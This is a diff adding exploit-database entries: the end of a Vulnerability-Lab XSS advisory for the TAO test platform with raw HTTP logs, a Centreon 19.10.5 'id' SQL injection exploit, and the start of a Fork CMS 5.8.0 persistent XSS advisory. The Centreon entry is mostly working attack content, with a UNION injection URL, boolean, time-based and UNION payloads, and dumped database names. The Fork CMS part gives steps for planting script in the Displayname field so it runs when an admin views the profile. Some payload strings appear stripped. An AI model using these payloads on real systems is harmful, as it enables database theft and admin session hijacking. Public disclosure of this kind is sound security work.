+X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true&=&emailAddress=test" + + + +PoC: Payload +" + + +--- PoC Session Logs [POST] --- +http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612 +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 9664 +Origin: http://localhost:89 +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI +Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[], +"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false, +"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":true, +"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[], +"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true, +"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses": +false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true, +"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef", +"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}, +{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[], +"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl +":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories" +:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[], +"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href": +"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6", +"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"", +"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"}, +"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No +outcome processing. +Erase the existing rules, if +any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}} +- +POST: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Security-Policy: frame-ancestors 'self' +Content-Length: 14 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/json; charset=UTF-8 +- +http://localhost:89/tao/Main/evil.source +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 169 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +Security Risk: +============== +1.1 +The security risk of the html inject web vulnerability in the +web-application is estimated as medium. + +1.2 +The security risk of the persistent cross site scripting web +vulnerability in the web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt new file mode 100644 index 000000000..6a9c7ba07 --- /dev/null +++ b/exploits/php/webapps/48345.txt @@ -0,0 +1,69 @@ +# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection +# Date: 2020-04-19 +# Exploit Author: Basim alabdullah +# Vendor Homepage: https://www.centreon.com +# Software Link: https://download.centreon.com/ +# Version: v.19.10.5 +# Tested on: Centos 5 + + +[EXECUTIVE SUMMARY] + + Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web. + + Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring. + Downloaded by hundreds and thousands of IT professionals worldwide. + The analysis discovered a time-based blind SQL + injection vulnerability in the tracker functionality of + Centreon Monitoring software. A malicious user can inject arbitrary + SQL commands to the application. The vulnerability lies in the project tracker + service search functionality; depending on project visibility successful + exploitation may require user authentication. A successful attack + can read, modify or delete data from the database or execute arbitrary commands on the underlying system. + +[VULNERABLE VERSIONS] + + The following version of the Centreon Monitoring was affected by the + vulnerability; previous versions may be vulnerable as well: + - Centreon version 19.10.5 + + +[Proof of Concept] + + http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23 + + + [Payloads] + + Parameter: svc_id (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: hid=15&svc_id=1 OR NOT 5782=5782 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy) + + Type: UNION query + Title: MySQL UNION query (NULL) - 5 columns + Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL# +--- +[12:24:35] [INFO] testing MySQL +[12:24:35] [INFO] confirming MySQL +[12:24:35] [INFO] the back-end DBMS is MySQL +[12:24:35] [INFO] fetching banner +web server operating system: Linux Red Hat +web application technology: Apache 2.4.34, PHP 7.2.24 +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) +banner: '10.1.38-MariaDB' +[12:24:35] [INFO] fetching database names +[12:24:35] [INFO] starting 4 threads +[12:24:35] [INFO] resumed: 'centreon' +[12:24:35] [INFO] resumed: 'test' +[12:24:35] [INFO] resumed: 'centreon_storage' +[12:24:35] [INFO] resumed: 'information_schema' +available databases [4]: +[*] centreon +[*] centreon_storage +[*] information_schema +[*] test \ No newline at end of file diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt new file mode 100644 index 000000000..64d991ee6 --- /dev/null +++ b/exploits/php/webapps/48348.txt @@ -0,0 +1,491 @@ +# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.fork-cms.com/download +# Software Link: https://github.com/forkcms/forkcms/pull/3073 +# CVE: N/A + +Document Title: +=============== +Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2208 + +ID (3073): https://github.com/forkcms/forkcms/pull/3073 + + +Release Date: +============= +2020-04-17 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2208 + + +Common Vulnerability Scoring System: +==================================== +5.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Fork is an easy to use open source CMS using Symfony Components. Fork +CMS is dedicated to creating a user friendly environment +to build, monitor and +update your website. We take great pride in being the Content Management +System of choice for beginners and professionals. + +(Copy of the Homepage: https://www.fork-cms.com & +https://www.fork-cms.com/download ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the official Fork CMS v5.8.0. + + +Affected Product(s): +==================== +ForkCMS +Product: Fork CMS v5.8.0 - Content Management System (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been +discovered in the official Fork CMS v5.8.0 open-source web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent input validation web vulnerabilities are located in the +`Displayname` input field when using the `Add`, `Edit` or `Register` +mechanism that forwards the information into the `var` parameter. Remote +attackers and privileged application user accounts are able to +inject own malicious persistent script code as the users displayname by +usage of the registration module (/profiles/register). Privileged +users with access to the profile or users module are able to exploit the +issue by a simple inject. The displayname then becomes visible in +the Admin - Profiles Index on Preview, Edit User/Profile, Delete User +Interaction and User Index in Listing modules. the var parameter +does not encode or parse the exisiting injected content and executes it. +The request method to inject is POST and the attack vector of the +vulnerability is located on the application-side of the content +management system. The injection point is located in the registration form +and the add/edit user function. The execution point of the issue occurs +in the preview profile, edit user, user index listing and delete +user message context. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Register +[+] Add User +[+] Edit User + +Vulnerable Input(s): +[+] Displayname + +Vulnerable Parameter(s): +[+] var + +Affected Module(s): +[+] Preview Profile +[+] Edit User +[+] User Index +[+] Delete User + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information an steüs below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the fork cms web-application newst version +2. Move via sitemap or by link to the registration page +(/modules/profiles/register) +3. Inject your script code payload html/js to the Displayname input field +4. Register the account by pushing submit +5. Activate the link in the account registration email +Note: Now simple wait until the administrator / privileged user visits +the panel to execute the code on interaction or preview only +6. Successful reproduce of the persistent script code injection +vulnerability! + + +PoC: Vulnerable Source (User Index in Listing - +https://fork-cms.localhost:8080/private/en/users/index) + +test3">